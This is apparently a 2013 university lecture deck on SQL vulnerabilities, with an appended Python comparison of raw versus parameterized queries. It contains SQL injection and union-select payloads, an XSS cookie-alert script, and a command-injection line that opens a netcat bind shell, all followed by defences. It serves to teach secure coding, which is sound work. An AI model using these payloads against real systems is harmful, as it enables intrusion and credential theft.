SQL Vulnerabilities - University of Tulsa

Nick Tsamis
University of Tulsa
CS 7493
April 2013

What is SQL?
Why SQL Matters.
*yawn* What’s the big deal?
What could possibly go wrong?
 • SQL Injection
 • XSS
 • Command Execution
 • *pffft* So we shouldn’t use SQL?
 • That’s some smart SQL!
Structured Query Language
 • Language
   • Specialized programming language
   • Utilized in relational databases
 • Query
   • Raw data is queried to obtain information
   • “Our business is turning data into information.” – Michael A. Peterson
 • Structured
   • Adheres to a strict, defined format
[Figure: anatomy of a SQL query: Query, Table, Column]
[Figure: Relational Databases vs Hierarchical Databases. Hierarchical: top down flow only. Relational: data relations are stored]
Popularity
 • One of the first commercial languages for relational models
 • Today, exists as the de facto standard (ANSI and ISO)
 • It’s EVERYWHERE
Versatility
 • It’s flexible:
   • T-SQL
   • MySQL
   • LINQ
Vulnerabilities
 • SQL is powerful…if you grant it
 • Manages data, some of which is sensitive
 • Provides a great entry point for access
 • Recovering lost password:
*yawn*
 • Security is not always implicit
 • Raw SQL can be very vulnerable to simple injections
   • if $EMAIL = "anything' OR 'x'='x"
SQL Injection
 • Injecting unintended code into a query
 • Returning user name from ID
 • Source code
Injections.
 • The attack
   • We add a second condition that will always evaluate to true (1=1)
   • Purpose is to dump all user information
   • $id = ' or 1=1 #
   • WHERE user_id = '' or 1=1 #'";
SQL Injection
 • Injecting unintended code into a query
 • Returning sql information
 • The attack(s)
   • We add a union select to dump additional data
   • $id = ' union SELECT 1, user() #
     • Yields current sql user
   • $id = ' and 1=1 union select database(),version() #
     • Yields current sql version and database name
Injections.
SQL Injection
 • Injecting unintended code into a query
 • Case Study
   • Returning the good stuff!!
 • The attack(s)
   • We add a union select to dump password data
   • $id = ' union select user, password FROM users #
     • Yields current user and associated password (hash)
Injections.
XSS (Cross Site Scripting)
 • Execute unintended scripts inline
 • Throw an alert
   • Passed as a url argument
XSS.
 • What if we put an inline script in that url?
 • Alert box shown:
XSS (Cross Site Scripting)
 • Well that wasn’t exactly l33t…
 • Have a cookie
   • <script>alert(document.cookie)</script>
 • Alert box shown:
XSS.
 • More serious implications:
   • Run a custom script that can open a remote connection (backdoor)
   • Read and dump configuration data (SQL or OS)
Command Execution
 • Use the secret entrance
 • A site that allows for free IP Pinging
 • Sample source:
Execution.
 • Concatenating commands might work…
   • 192.168.200.128;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe
   • Attempts to allow connections on port 8999 with netcat (nc)
 • Upon execution, browser waits for connection on port 8999
Better SQL
 • Stored Procedures
   • Preformat and secure a static query
   • Grant access to a SP, not the tables it accesses
   • Typically increased performance
     • Parameter check – data typing
     • No network traffic – run inside the engine
*pffft*
 • String Filtering/Escaping
   • String escape characters
     • '
     • "
     • \
     • NUL
No, we should use better SQL.
Mo’ Better SQL
 • Parameterized SQL
   • Strongly typed data is bound on execution
   • Parameters are populated and checked
   • User input is not directly embedded
*pffft*
 • Database Management
   • Permission limitation
   • Principle of Least Privilege
No, we should use better SQL.
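An added example (not from the deck) that puts the raw string-built query from the injection slides beside the parameterized form recommended here, using Python's sqlite3 as a stand-in for the deck's PHP/MySQL setup. The `users` table and its three rows are constructed sample data, and the payload is the deck's own `' OR 'x'='x` from the *yawn* slide.

```python
import sqlite3

# Constructed sample data standing in for the deck's `users` table (assumption:
# columns user_id, user, password; the "hashes" are placeholders, not real digests).
SAMPLE_USERS = [
    (1, "admin", "<hash-admin>"),
    (2, "gordonb", "<hash-gordonb>"),
    (3, "pablo", "<hash-pablo>"),
]

# The deck's $EMAIL payload: closes the quoted value and appends an always-true clause.
INJECTED_ID = "' OR 'x'='x"


def make_db():
    """In-memory SQLite database loaded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_raw(conn, user_id):
    """The deck's 'raw SQL': the value is pasted into the query text, so a quote
    in the input ends the literal and the rest is parsed as SQL grammar."""
    sql = f"SELECT user FROM users WHERE user_id = '{user_id}' ORDER BY user_id"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, user_id):
    """Parameterized form: the value is bound to the ? placeholder at execution
    and never parsed as SQL, so the same payload is just a string matching nothing."""
    sql = "SELECT user FROM users WHERE user_id = ? ORDER BY user_id"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def compare(user_id):
    """Run both lookups on the same input and return the results side by side."""
    conn = make_db()
    return {"raw": lookup_raw(conn, user_id), "parameterized": lookup_param(conn, user_id)}


if __name__ == "__main__":
    print("normal input :", compare("2"))
    print("injected     :", compare(INJECTED_ID))
```

With the injected value the raw query becomes `WHERE user_id = '' OR 'x'='x'` and returns every row, which is exactly the dump the injection slides describe; the bound version returns no rows.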